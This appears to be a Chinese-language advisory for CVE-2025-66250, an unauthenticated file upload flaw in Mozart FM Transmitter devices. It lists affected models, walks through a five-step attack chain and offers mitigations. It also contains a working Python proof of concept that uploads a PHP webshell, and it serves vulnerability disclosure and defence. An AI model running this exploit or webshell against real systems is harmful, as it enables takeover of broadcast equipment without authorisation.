CVE-2025-66250: DB Electronica Mozart FM Transmitter 未授权任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-66250

漏洞类型

任意文件上传

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter

漏洞概述

CVE-2025-66250是DB Electronica Telecomunicazioni S.p.A.公司生产的Mozart FM发射器中的一个严重安全漏洞。该漏洞存在于status_contents.php文件中，允许未经身份验证的攻击者执行任意文件上传操作。Mozart FM发射器是一款专业级广播设备，广泛应用于电台传输领域，支持多种型号包括30、50、100、300、500、1000、2000、3000、3500、6000和7000等版本。攻击者可以通过发送特制的HTTP请求到服务器的/var/tdf/status_contents.php端点，无需提供任何有效的用户凭证即可上传恶意文件到目标系统。由于该漏洞的CVSS评分高达9.8分，属于严重级别，且攻击复杂度低、无需认证即可利用，因此对使用受影响版本设备的组织构成极高的安全风险。成功利用此漏洞可能导致服务器被完全接管，进而对广播系统的机密性、完整性和可用性造成严重影响。

技术细节

该漏洞的根本原因在于status_contents.php文件缺少适当的身份验证机制和文件上传安全验证。攻击者可以直接通过HTTP POST请求向服务器发送恶意文件，服务器端未对上传文件的类型、内容和扩展名进行严格检查。具体利用方式为：攻击者构造包含恶意文件的HTTP请求，目标地址为受影响的Mozart FM Transmitter设备的/var/tdf/status_contents.php路径。请求中包含精心构造的文件内容，通常为WebShell或后门程序。由于系统未验证用户身份且未限制可上传的文件类型，攻击者可以上传任意扩展名的文件。上传成功后，攻击者可以通过访问上传文件来执行任意代码，从而获得系统的完全控制权。此漏洞无需任何前置条件，攻击者可从网络直接发起，且可同时影响机密性、完整性和可用性三个安全属性。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标是否为DB Electronica Mozart FM Transmitter设备，并确认其版本是否在受影响列表中（30、50、100、300、500、1000、2000、3000、3500、6000、7000）。

STEP 2

步骤2: 构造恶意请求

攻击者准备包含恶意代码的文件（如WebShell），并构造HTTP POST请求，目标指向设备的/var/tdf/status_contents.php端点。

STEP 3

步骤3: 发送上传请求

攻击者向目标服务器发送未经身份验证的HTTP POST请求，由于服务器未验证用户身份且未检查文件类型，恶意文件被成功上传。

STEP 4

步骤4: 执行恶意代码

攻击者通过HTTP请求访问上传的恶意文件，触发WebShell执行，从而在服务器上执行任意系统命令。

STEP 5

步骤5: 持久化控制

攻击者利用已获得的访问权限，进一步部署后门程序、窃取敏感数据或完全接管广播系统的控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-66250 PoC - Unauthenticated Arbitrary File Upload
# Target: DB Electronica Mozart FM Transmitter
# Endpoint: /var/tdf/status_contents.php

def exploit(target_url, filename='shell.php', payload=None):
    """
    Exploit for CVE-2025-66250
    Upload arbitrary file to Mozart FM Transmitter
    """
    if payload is None:
        payload = '<?php echo system($_GET["cmd"]); ?>'
    
    target = target_url.rstrip('/') + '/var/tdf/status_contents.php'
    
    files = {
        'file': (filename, payload, 'application/octet-stream')
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }
    
    try:
        print(f'[*] Target: {target}')
        print(f'[*] Uploading: {filename}')
        
        response = requests.post(target, files=files, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print('[+] File uploaded successfully!')
            print(f'[+] Access uploaded file at: {target_url}/var/tdf/{filename}')
            return True
        else:
            print(f'[-] Upload failed. Status code: {response.status_code}')
            return False
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url>')
        print(f'Example: python {sys.argv[0]} http://192.168.1.100')
        sys.exit(1)
    
    target_url = sys.argv[1]
    exploit(target_url)

影响范围

Mozart FM Transmitter 30

Mozart FM Transmitter 50

Mozart FM Transmitter 100

Mozart FM Transmitter 300

Mozart FM Transmitter 500

Mozart FM Transmitter 1000

Mozart FM Transmitter 2000

Mozart FM Transmitter 3000

Mozart FM Transmitter 3500

Mozart FM Transmitter 6000

Mozart FM Transmitter 7000

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1) 使用网络访问控制列表（ACL）限制对设备管理界面的访问，仅允许受信任的IP地址访问；2) 部署Web应用防火墙（WAF）规则，阻止对status_contents.php端点的未授权访问；3) 定期监控设备日志，检测异常的HTTP请求和文件上传行为；4) 考虑在边界防火墙上封锁相关端口的入站访问；5) 如业务允许，暂时禁用设备的Web管理界面功能，切换到更安全的带外管理方式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66250
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66250
3 Details https://www.cvedetails.com/cve/CVE-2025-66250/
4 VulDB https://vuldb.com/cve/CVE-2025-66250
5 Link https://www.abdulmhsblog.com/posts/webfmvulns/